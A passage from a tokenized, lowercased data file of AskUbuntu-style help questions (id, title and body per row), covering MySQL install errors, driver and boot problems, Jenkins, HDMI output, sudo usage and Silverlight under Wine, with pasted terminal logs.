mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . innodb : unable to lock ./ibdata1 , error : 11 innodb : check that you do not already have another mysqld process innodb : using the same innodb data or log files . 130905 11:50:18 innodb : unable to open the first data file innodb : error in opening ./ibdata1 130905 11:50:18 innodb : operating system error number 11 in a file operation . innodb : error number 11 means 'resource temporarily unavailable ' . innodb : some operating system error numbers are described at innodb : http : //dev.mysql.com/doc/refman/5.5/en/operating-system-error-codes.html 130905 11:50:18 innodb : could not open or create data files . 130905 11:50:18 innodb : if you tried to add new data files , and it failed here , 130905 11:50:18 innodb : you should now edit innodb_data_file_path in my.cnf back 130905 11:50:18 innodb : to what it was , and remove the new ibdata files innodb created 130905 11:50:18 innodb : in this failed attempt . innodb only wrote those files full of 130905 11:50:18 innodb : zeros , but did not yet use them in any way . but be careful : do not 130905 11:50:18 innodb : remove old data files which contain your precious data ! 130905 11:50:18 [ error ] plugin 'innodb ' init function returned error . 130905 11:50:18 [ error ] plugin 'innodb ' registration as a storage engine failed . 130905 11:50:18 [ error ] unknown/unsupported storage engine : innodb 130905 11:50:18 [ error ] aborting 130905 11:50:18 [ note ] /usr/sbin/mysqld : shutdown complete start : job failed to start invoke-rc.d : initscript mysql , action `` start '' failed . dpkg : error processing mysql-server-5.5 ( -- configure ) : subprocess installed post-installation script returned error exit status 1 dpkg : dependency problems prevent configuration of mysql-server : mysql-server depends on mysql-server-5.5 ; however : package mysql-server-5.5 is not configured yet . dpkg : error processing mysql-server ( -- configure ) : dependency problems - leaving unconfigured no apport report written because the error message indicates its a followup error from a previous failure . e : sub-process /usr/bin/dpkg returned an error code ( 1 ) i get thee above . during the installation it asked me to enter the root password but at the end it said could not set root password as it already existed . i tried to login using mysql -u root -p '' but it gives this message error 1045 ( 28000 ) : access denied for user 'root ' @ 'localhost ' ( using password : no ) when i do a ps aux | grep mysql i see this ps aux | grep mysql 1000 19359 0.0 0.0 8104 920 pts/0 s+ 03:29 0:00 grep -- color=auto mysql root 51064 0.0 0.0 4400 752 ? s sep05 0:00 /bin/sh /opt/mysql/server-5.6/bin/my sqld_safe -- datadir=/var/lib/mysql -- pid-file=/var/run/mysqld/mysqld.pid mysql 51435 0.0 1.3 1131668 451592 ? sl sep05 0:45 /opt/mysql/server-5.6/bin/mysqld -- b asedir=/opt/mysql/server-5.6 -- datadir=/var/lib/mysql -- plugin-dir=/opt/mysql/server-5.6/lib/plugin - -user=mysql -- log-error=/var/log/mysql/error.log -- pid-file=/var/run/mysqld/mysqld.pid -- socket=/var/ run/mysqld/mysqld.sock -- port=3306 does this mean the root user is active if yes how do i remove ? message after retried to install 5.5 unable to set password for the mysql `` root '' user an error occurred while setting the password for the mysql administrative user . this may have happened because the account already has a password , or because of a communication problem with the mysql serve . you should check the account 's password after the package installation .
341944	broadcom sta driver failed to install	here is another guy bothering you about broadcom wireless drivers . i know there are a lot of answered questions dealing with this issue , but none of the solutions seemed to work for me . i 'm running ubuntu 12.04lts and wireless card is : broadcom corporation bcm4313 [ 14e4:4727 ] . i already installed the necessary headers , but when i try to activate the driver in `` additional drivers '' , i get '' sorry , installation of this driver failed '' . any help would be appreciated . note : i would appreciate a step by step solution as my linux knowledge is mediocre
341951	installation , boot problems	i just installed the latest version of lubuntu on an older computer . everything seemed fine until it tried to start up after the installation was done and the dvd was ejected . it showed a lubuntu screen , bu then just a small blinking white line , like an underscore , and blank screen . this just repeats over and over . can anyone help ? btw , i do n't know much about computers so basic is better .
341953	how do i get ride of this nonstop crash , freeze , not booting issues ?	made 12.04 64-bit usb bootable . then i have been trying to install almost like twenty times to get succeed but still its failing / crashing/ freezing , after showing grub screen . what can i do to fix this ? i have tried nomodeset and vga=770 steps tried : power on , bios shows i select the kernel and press e to go in details and press f10 to boot nothing just happens steps tried : power on , bios shows hold shift key to have grub press f2 to go to grub command line but unable to boot in the installed os
341954	transmission stopped working	i was impatient with a torrent download and then i opened transmission 's preferences and went changing everything i could to as close as possible to infinite , closed and ok. after seeing that the speed was still the same i went over the preferences dialog again and set the values of “queue” section under “downloading” tab to “999999999999” , although it does n't allow such values and reset to the maximum permitted . obviously that changing that would n't increase the speed , although i was veeery impatient , and after changing “downloads sharing data in the last n minutes are active” , which also did n't accepted the astronomic number and reset my entry to “28410” , transmission froze , i tried to force it to close and open it again but it lags to start and when it do start , already starts frozen . now not even removing or purging or manually deleting it 's files and then installing again transmission-gtk and transmission-common will do the job . i suspect that some configuration file is being kept after purging transmission , because when i install it again , all my torrents are still there ( and i only use magnet links ) and they show the correct progress bars . after starting transmission it will work for 3 seconds and freeze after that , in these 3 seconds i managed to open preferences dialog and i saw that the value of “downloads sharing data in the last n minutes are active” is still “28410” . if at least i knew where the file that stores these values is , i could manually reset them all . and when i start a guest session and open transmission it will work normally , reinforcing that the problem is in the value of “downloads sharing data in the last n minutes are active” that i changed up to the maximum . what should i do ?
341955	problem in jenkins installation on ubuntu 12.04.3 lts	$ sudo apt-get install jenkins reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : jenkins 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 57.8 mb of archives . after this operation , 63.5 mb of additional disk space will be used . get:1 http : //pkg.jenkins-ci.org/debian/ binary/ jenkins 1.529 [ 57.8 mb ] fetched 57.8 mb in 18s ( 3,198 kb/s ) selecting previously unselected package jenkins . ( reading database ... 220980 files and directories currently installed . ) unpacking jenkins ( from ... /archives/jenkins_1.529_all.deb ) ... dpkg : error processing /var/cache/apt/archives/jenkins_1.529_all.deb ( -- unpack ) : trying to overwrite '/usr/share/jenkins/jenkins.war ' , which is also in package jenkins-common 1.424.6+dfsg-1ubuntu0.2 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) no apport report written because maxreports is reached already errors were encountered while processing : /var/cache/apt/archives/jenkins_1.529_all.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) can you please help ?
341957	need a fixed dvd mount point for wine	i am having problems with wine under kubuntu 13.04 . kde automounts dvds under /mount/label , but wine need a fixed point like /media/cdrom to link to from .wine/dosdevices/ . should i put fixed mounts in /etc/fastab ? does that work together with the solid automounter ?
341959	how do i actually delete files ?	i have an sd card that is full . despite deleting files on it it is still full . i only have this problem in ubuntu . what is going on ?
341965	how can i increase the viewing history ( recent documents ) in okular ?	i tried looking for an entry/number in ~/.kde/share/config/okularrc but there was nothing to edit there as to allow me to increase the number of saved addresses
341967	ipod does n't mount correctly	i 'm trying to sync rhythmbox to an ipod classic using ubuntu 12.04 . it worked at first , and then i got some error messages involving libgpod-common , and now the ipod does n't even mount . it does n't show up in my file system , but i can see it in the disk utility , mounted at /tmp/ipodia0gip . when i try to safely remove it from the disk utility , it says that it 's busy and ca n't be removed , but it works if i unmount it and then remove it from the disk utility . how can i get it to pop up in rhythmbox ?
341971	how to use the main menu ?	according to the answer of using gedit in ubuntu i have installed the main menu application and i can change the content of the `` command '' text box for gedit . but i do not see how to use the menu to start application listed in it , namely the gedit . i have tried the help button from the main menu , but i only got a message document not found the uri âghelp : user-guide ? menu-editor # menu-editor ' does not point to a valid page . . thanks .
341973	unable to install from mythbuntu installation disc	i can not install mythbuntu 12.04.2 64bit . i have downloaded the image and burnt it to cd , however my computer does not see it as bootable . much like the problem presented with this post `` unable to boot from installation disc '' i tried putting the image on usb ( via http : //www.pendrivelinux.com/yumi-multiboot-usb-creator/ ) and booting it from the usb drive , however the boot menu does not show the mythbuntu os as a bootable option . my computer will boot windows 7 and ubuntu os versions from the cd-rom without problems and i have selected the correct drive to boot from via f12 each time . i have tried a earlier version of mythbuntu 10.01 downloaded via torrents and had the same problems . i have even tried installing the 32 bit version . my hardware are the folloing : motherboard is a gigabyte ga-p55a-ud3r graphic card sapphire ati hd 5450 ram 4gb hard drive 1.5tb western digital greenpower ; proccessor intel i5 760 ;
341975	hdmi automatically clones when connected , does not appear in `` displays ''	i 've been looking for days to figure out what is going on but i am completely lost . i am unable to control the screen settings on my external monitor ( hdmi ) . the external display is not detected at all however i do get output from hdmi when i plug the cable in . so the hdmi output is certainly active i checked settings- > display and only my laptop screen shows up . i would like to be able to control my external screen my graphics card : user @ host : ~ $ lspci | grep 'vga' 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) i am currently using ubuntu 12.04 lts some general outputs user @ host : ~ $ xrandr xrandr : failed to get size of gamma for output default screen 0 : minimum 1366 x 768 , current 1366 x 768 , maximum 1366 x 768 default connected 1366x768+0+0 0mm x 0mm 1366x768 0.0* user @ host : ~ $ lspci 00:00.0 host bridge : intel corporation 2nd generation core processor family dram controller ( rev 09 ) 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) 00:16.0 communication controller : intel corporation 7 series/c210 series chipset family mei controller # 1 ( rev 04 ) 00:1a.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 2 ( rev 04 ) 00:1b.0 audio device : intel corporation 7 series/c210 series chipset family high definition audio controller ( rev 04 ) 00:1c.0 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 1 ( rev c4 ) 00:1c.1 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 2 ( rev c4 ) 00:1c.2 pci bridge : intel corporation 7 series/c210 series chipset family pci express root port 3 ( rev c4 ) 00:1d.0 usb controller : intel corporation 7 series/c210 series chipset family usb enhanced host controller # 1 ( rev 04 ) 00:1f.0 isa bridge : intel corporation 7 series chipset family lpc controller ( rev 04 ) 00:1f.2 sata controller : intel corporation 7 series chipset family 6-port sata controller [ ahci mode ] ( rev 04 ) 00:1f.3 smbus : intel corporation 7 series/c210 series chipset family smbus controller ( rev 04 ) 00:1f.6 signal processing controller : intel corporation 7 series/c210 series chipset family thermal management controller ( rev 04 ) 01:00.0 network controller : qualcomm atheros ar9462 wireless network adapter ( rev 01 ) 02:00.0 ethernet controller : realtek semiconductor co. , ltd. rtl8101e/rtl8102e pci express fast ethernet controller ( rev 05 ) 03:00.0 unassigned class [ ff00 ] : realtek semiconductor co. , ltd. rts5209 pci express card reader ( rev 01 ) things i 've tried : running xrandr to set display to hdmi1 , however hdmi is not detected and does not make a difference plugging hdmi in before booting machine , no change in behavior , hdmi output is active but still not detected there does not appear to be an xorg.conf that i can edit either something werid : under the `` system details '' in the graphics section , it lists the driver as `` unknown '' and experience `` standard '' . i 've also tried to reinstall all the intel xorg video drivers , still no change side note : my hdmi audio works perfectly
341979	what to do about `` the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present '' ?	while booting ubuntu 12.04 , the disk drive for /dev/mapper/cryptswap1 is not ready yet or not present is showing . what is this ? is this is an error ?
341980	running a program as another user without typing a password	i 'm trying to mark my browser internet traffic with a dscp by selecting the packages with a certain owner . in order to do that i have to start my browser with a dummy user . i start my browser by binding a terminal command to a keyboard shortcut . so for now that has always been chromium-browser . the steps i have taken so far : create a new user : sudo useradd < dummy user > sudo passwd < dummy user > sudo mkdir /home/ < dummy user > sudo chown < dummy user > /home/ < dummy user > sudo chgrp < dummy user > /home/ < dummy user > allow the new user to acces x xhost + run the command as the new user i start a terminal as the original user ( non-root ) and run the following command : su < dummy user > -c chromium-browser after typing the dummy user password i can run the chromium-browser as the dummy user . chromium will be all new and wo n't have any of my old settings since it uses the newly created dummy user home dir . now i do n't want to have to enter a password at any stage so i looked into how to work with the sudoers file . apperently it is possible to run a command as another user without being prompt for the password by changing the sudoers file . i have not yet figured out exactly how but i think it relies on sudo -u . which also allows you to run a command as someone else . before i started to adapt the sudoers file i wanted to test this structure . so i ran : sudo -u < dummy user > chromium-browser and i got the following error : [ 0906/012127 : error : nss_util.cc ( 90 ) ] failed to create /home/ < user > /.pki/nssdb directory . [ 0906/012127 : error : nss_util.cc ( 90 ) ] failed to create /home/ < user > /.pki/nssdb directory . home directory /home/ < user > not ours . where < user > is my username . so it tries to acces my home users home dir . i 'm hoping someone can help me figure this out . i have the feeling i 'm sort of in the right direction but i need someone let me see what i 'm doing wrong . also any help on how to change the sudoers file would be appreciated . thanks in advance !
341981	easy way to create movie dvds ? dvdstyler qdvdauthor devede no go	i 've been trying to create a movie dvd with some authoring tools after having split out my vid/aud/sub through avconv . after reading through the many man pages and website tips , editing xml files for dvdauthor looks to be too much a pain . qdvdauthor seems to have collected development/support dust and require libavcodec-extras-52 which i ca n't get installed . dvd styler seems to go nowhere with an enigmatic error menu creation before rudely crashing . anyone have a better suggestion ? devede complains it seems a bug in mencoder at any attempt to create something .
341987	what dvd players allow easy selection of chapters/titles during playback ?	i need a dvd player that shows this : that is windows media player 12 , it shows chapter and title that its playing . thanks in advance and please do n't tell me vlc , because it does n't have that feature .
341988	my jenkins jobs fails to start	when i try to start jenkins on my ubuntu 12.04.3 lts i get an error $ sudo start jenkins start : job failed to start
341992	after installing cinnamon , left with nemo ( which does n't show a global menu )	after playing a little bit with cinnamon i decided to uninstall it . so i logged out from the cinnamon session and logged in to my unity session . i then typed sudo apt-get purge cinnamon* and then enter . now i am stuck with nemo file manager which does n't show a global menu at the top of the screen . the thing is that i would like to see its preferences to test if it could work for me , but i ca n't . what can i do ? i would prefer installing nautilus and then trying to install nemo without cinnamon ( if that would make things better ) . this is how it looks like :
341996	what is the answer to `` are you root '' when installing packages ?	what is the answer to `` are you root '' in ubuntu 12.10 . i was installing the restricted extras for the 12.10 when i got this message after typing my password . i typed yes and now all i see are y in the command prompt . please help me , i am new.just installed it yesterday .
341998	steam not booting up ?	maybe it 's because of the driver ? i 'm running ubuntu 12.04 lts on an hp pavilion dv7 with a radeon video card . steam xio : fatal io error 11 ( resource temporarily unavailable ) on x server `` :0 '' after 7 requests ( 7 known processed ) with 0 events remaining . downloader @ downloader : ~ $ steam running steam on ubuntu 12.04 64-bit steam_runtime is enabled automatically [ 2013-09-05 20:33:10 ] startup - updater built aug 28 2013 13:29:34 installing breakpad exception handler for appid ( steam ) /version ( 1377723241_client ) xlib : extension `` glx '' missing on display `` :0 '' . looks like steam did n't shutdown cleanly , scheduling immediate update check installing breakpad exception handler for appid ( steam ) /version ( 1377723241_client ) [ 2013-09-05 20:33:10 ] checking for update on startup [ 2013-09-05 20:33:10 ] checking for available updates ... installing breakpad exception handler for appid ( steam ) /version ( 1377723241_client ) [ 2013-09-05 20:33:11 ] download skipped : /client/steam_client_ubuntu12 version 1377723241 , installed version 1377723241 [ 2013-09-05 20:33:11 ] nothing to do [ 2013-09-05 20:33:11 ] verifying installation ... [ 2013-09-05 20:33:11 ] performing checksum verification of executable files [ 2013-09-05 20:33:11 ] verification complete unlinked 0 orphaned pipes removing stale semaphore last operated on by process 3364 with name 0eblobregistrymutex_c1f8136ad979a434c95eca754b1635a0 removing stale semaphore last operated on by process 3364 with name 0eblobregistrysignal_c1f8136ad979a434c95eca754b1635a0 removing stale semaphore last operated on by process 3364 with name 0emsteamengineinstance removing stale semaphore last operated on by process 3364 with name 0esteamenginelock xlib : extension `` glx '' missing on display `` :0 '' . opengl glx extension not supported by display and here 's the bit of information asked.. downloader @ downloader : ~ $ lspci -nnk | grep -a5 vga and glxinfo | grep -i render grep : and : no such file or directory grep : glxinfo : no such file or directory downloader @ downloader : ~ $ apt-cache policy libgl1-mesa-dri libgl1-mesa-glx libgl1-mesa-dri : installed : ( none ) candidate : 8.0.4-0ubuntu0.6 version table : 8.0.4-0ubuntu0.6 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 8.0.2-0ubuntu3 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages libgl1-mesa-glx : installed : ( none ) candidate : 8.0.4-0ubuntu0.6 version table : 8.0.4-0ubuntu0.6 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise-updates/main amd64 packages 500 http : //security.ubuntu.com/ubuntu/ precise-security/main amd64 packages 8.0.2-0ubuntu3 0 500 http : //us.archive.ubuntu.com/ubuntu/ precise/main amd64 packages downloader @ downloader : ~ $
341999	how to create ami instanse store from ubuntu disk image ?	there are good images on ubuntu website : http : //uec-images.ubuntu.com/saucy/current/ when i try to make my own ami : ec2-bundle-image -i saucy-server-cloudimg-amd64-disk1.img ec2-upload-bundle -b mybucket/saucy1 -m saucy1/saucy1.manifest.xml ec2-register mybucket/saucy1/saucy1.manifest.xml -n saucy1 -- kernel aki-88aa75e1 resulting ami fails to boot with following words in log : thread `` main '' : pointer : 0x206a402f70 , stack : 0x13d0000 '' main '' `` root=/dev/sda1 '' `` ro '' `` 4 '' vbd 2049 is hd0 ******************* blkfront for device/vbd/2049 ********** backend at /local/domain/0/backend/vbd/3939/2049 failed to read /local/domain/0/backend/vbd/3939/2049/feature-barrier . failed to read /local/domain/0/backend/vbd/3939/2049/feature-flush-cache . 482432 sectors of 512 bytes .. vbd 2050 is hd1 ******************* blkfront for device/vbd/2050 ********** .. and later grub console shows and asks where to boot from . it looks like the problem is in root specification , because ubuntu ami is booted with something like root=label=cloudimg-rootfs ok , i 've created another ami : ec2-register mybucket/saucy1/saucy1.manifest.xml -n saucy1 -- kernel aki-88aa75e1 -- root-device-name `` label=cloudimg-rootfs '' and i still fail to launch new ami . can anyone , please , share proper command line options to create bootable ami from existing image ?
342003	low graphics mode on fresh install	i am trying to install ubuntu 12.04 lts alongside a windows 7 install . i get the very discouraging `` low graphics mode '' error after trying to install . first , the screen shows a funky pattern then gives me the error . i have tried all of the options from the 4 it gives me without success . the computer has an nvidia gtx 660 card in it alongside intel i7 . i am using the 64 bit version of 12.04 to install . i have read about the issues with nvidia cards and most of them recommend installing the proprietary drivers . however , since i have not installed ubuntu and am running it from an iso cd i have no place to install these drivers to . can anyone advise as how to proceed ?
342009	how to disable dell trackpad when mouse plugged in to usb port ?	when in windows 7 i have the option to have the touchpad automatically be disabled when a usb mouse in plugged in . then when the mouse in unplugged the touchpad automatically becomes enabled . there is even a light at the top of the touchpad the comes on when it is in disabled mode ! is there a way to duplicate this functionality under ubuntu 13.04 ? ( i have a dell inspiron 15r with hybrid amd/intel graphics . )
342011	local webpage/website can not be displayed	this location could not be displayed prompts when i open the folder containing my website files in /home/html/mywebsite . it says you do not have the permissions necessary to view the contents of `` html '' , when i type mywebsite.com it says forbidden . can someone help me how to solve this problem , i dont know how to resolve restrictions in ubuntu im a windows user just trying out ubuntu for our linux project .
342013	how to set custom resolution for hdtv ?	totally new to ubuntu . trying to run it on a desktop to my hdtv . however the edges of the screen are cropped off . the res is too high . it needs to be shrunk in a bit . by using a bogus copy of windows 7 i figured out that i need a res of 1847x1026 . how to i set ubuntu to this res ? the pc is connected via hdmi . i 've tried editing xorg.conf in etc/x11 . i 've tried creating a 10-monitor file . the nvidia driver i have does n't have a option to disable `` force full gpu scaling '' . i 've google this issue to the point where i do n't know what to try next .
342018	`` sorry ubuntu * has experienced an internal error '' /usr/bin/compiz	i installed 13.04 as a virtual machine using virtualbox from oracle . when it was done doing the install , it says that it needs a reboot . after the reboot , i got this message : sorry ubuntu 13.04 has experienced an internal error /usr/bin/compiz i 'm not sure what it means and how to resolve it .
342025	new to linux , having problems installing ubuntu 12.04 to brand new laptop	i 've been trying to install ubuntu 12.04 on my new laptop ( currently a windows 7 os ) with a livecd , using 64-bit ( since the computer is only a few days old , and if it 's newer than 2010 , the 64-bit version is the one i should be using , correct ? ) and it boots to the installation just fine , but during installation it skips the step that gives me the option to dual boot with my current os ( something i would like to be able to do ) and takes me to the screen with partitioning . on this screen , the partitioning menu is empty and all of the buttons are greyed out . of course , if i press `` install now '' it gives me the error message , no root file system defined . please correct this from the partitioning menu . so , i would like to know how to install ubuntu to dual-boot , and i 'd like to know how to solve this partitioning issue . even though my computer does n't run on windows 8 , it is still new , so would i be able to/should i install using wubi ? as i said , i 'm new to linux and ubuntu , so i apologize for my inexperience .
342032	how to mount an aes-encrypted .dmg file containing a fat12 filesystem ?	my question says it all : on ubuntu , is there any way to mount a .dmg file ( as produced by os x 's disk utility ) that contains an aes-encrypted , fat12 filesystem ? i 've seen sporadic advice about how to mount .dmg files containing hfsplus filesystems , so i 'd have thought the fat12 ( aka , `` msdos '' ) filesystem would be even easier . the closest i 've come is : mount -oloop , encryption=aes-256 -t msdos privatedmg.dmg ~/mounted but this gives me the error ioctl : loop_set_status : invalid argument . i do n't know much about linux filesystem mechanics , but am eager to learn !
342034	how to get out of `` sudo -s '' command in terminal ?	i entered sudo -s command in terminal , and the it changed from shameek @ shameek-k55vd : ~ $ to root @ shameek-k55vd : ~ # . now when i click on the close terminal window icon it says , `` there is still a process running in the terminal , closing it may kill it '' . i am entirely new to ubuntu , please suggest a command to get back from root @ shameek-k55vd : ~ # to shameek @ shameek-k55vd : ~ $ and then i can close the terminal .
342035	how to enable moonlight/silverlight 5 on firefox ?	i have installed moonlight from this post here : http : //askubuntu.com/a/327862/188878 the problem is , the application/website i am trying to use `` requires '' silverlight 5. is there anyway to trick the website into thinking i have silverlight 5 so that i can at least try it out and see if it works . the website is www.dayforcehcm.com and its so that i can do my scheduling at work . if this doesnt work , its a near deal breaker for me and ubuntu.. or is there any other sources of a silverlight alternative/way i could access this website ? thanks . edit : had to remove some code because post became too long . the following code is from pipelight installed on firefox 23 running on ubuntu 13.04 checking the terminal output shows lots of errors , so perhaps this site actually is incompatible : fixme : thread : ntqueryinformationthread info class 16 not supported yet fixme : thread : ntqueryinformationthread info class 16 not supported yet fixme : module : getmodulehandleexw should pin refcount for 0x240000 fixme : urlmon : uri_getpropertybstr ( 0x5e61a78 ) - > ( 6 0x63dee4 4 ) fixme : thread : getthreadpreferreduilanguages 48 , 0x63e580 , ( nil ) 0x63e578 fixme : thread : getthreadpreferreduilanguages 48 , 0x63e580 , ( nil ) 0x63e578 fixme : time : getcalendarinfow unimplemented caltype 2 fixme : time : getcalendarinfow unknown caltype 56 fixme : time : getcalendarinfow unknown caltype 55 fixme : time : getcalendarinfow unknown caltype 49 fixme : time : getcalendarinfow unknown caltype 50 fixme : time : getcalendarinfow unknown caltype 51 fixme : time : getcalendarinfow unknown caltype 52 fixme : time : getcalendarinfow unknown caltype 53 fixme : time : getcalendarinfow unknown caltype 54 fixme : time : getcalendarinfow unknown caltype 21 fixme : time : getcalendarinfow unknown caltype 22 fixme : time : getcalendarinfow unknown caltype 23 fixme : time : getcalendarinfow unknown caltype 24 fixme : time : getcalendarinfow unknown caltype 25 fixme : time : getcalendarinfow unknown caltype 26 fixme : time : getcalendarinfow unknown caltype 27 fixme : time : getcalendarinfow unknown caltype 28 fixme : time : getcalendarinfow unknown caltype 29 fixme : time : getcalendarinfow unknown caltype 30 fixme : time : getcalendarinfow unknown caltype 31 fixme : time : getcalendarinfow unknown caltype 32 fixme : time : getcalendarinfow unknown caltype 33 fixme : time : getcalendarinfow unknown caltype 34 fixme : time : getcalendarinfow unknown caltype 35 fixme : time : getcalendarinfow unknown caltype 36 fixme : time : getcalendarinfow unknown caltype 37 fixme : time : getcalendarinfow unknown caltype 38 fixme : time : getcalendarinfow unknown caltype 39 fixme : time : getcalendarinfow unknown caltype 40 fixme : time : getcalendarinfow unknown caltype 41 fixme : time : getcalendarinfow unknown caltype 42 fixme : time : getcalendarinfow unknown caltype 43 fixme : time : getcalendarinfow unknown caltype 44 fixme : time : getcalendarinfow unknown caltype 45 fixme : time : getcalendarinfow unknown caltype 46 fixme : time : getcalendarinfow unimplemented caltype 4 fixme : time : getcalendarinfow unimplemented caltype 4 fixme : time : getcalendarinfow unknown caltype 57 fixme : time : getcalendarinfow unknown caltype 57 fixme : nls : enumtimeformatsw unknown time format ( 2 ) fixme : nls : enumtimeformatsw unknown time format ( 2 ) [ pipelight ] unscheduled event timer i tried wine today , installed firefox 23 , silverlight 5 . visited the website and seemed to get the same errors that pipelight got.. perhaps this is something that is wines fault then ? fixme : advapi : registertraceguidsw ( 0x1eb1f87 , 0x1f50118 , { aa087e0e-0b35-4e28-8f3a-440c3f51eef1 } , 1 , 0x33eaac , ( null ) , ( null ) , 0x1f50118 , ) : stub fixme : advapi : createprocessasuserw 0x11c l '' c : \\program files ( x86 ) \\microsoft silverlight\\5.1.20513.0\\agcp.exe '' l '' agcp.exe 109 276 '' ( nil ) ( nil ) 1 0x00004000 ( nil ) ( null ) 0x33ee30 0x33ee20 - semi- stub fixme : heap : heapsetinformation ( nil ) 1 ( nil ) 0 fixme : file : k32getmappedfilenamew ( 0xffffffff , 0x4015f4 , 0x50e1d4 , 520 ) : stub fixme : module : getmodulehandleexw should pin refcount for 0x1e40000 fixme : win : getrawinputdevicelist ( prawinputdevicelist= ( nil ) , puinumdevices=0x33cb54 , cbsize=8 ) stub ! fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : inet_queryoption unknown dwoption 10 fixme : wininet : inet_queryoption unhandled dwoption 4 fixme : wininet : inet_queryoption internet_option_per_connection_option stub fixme : wininet : 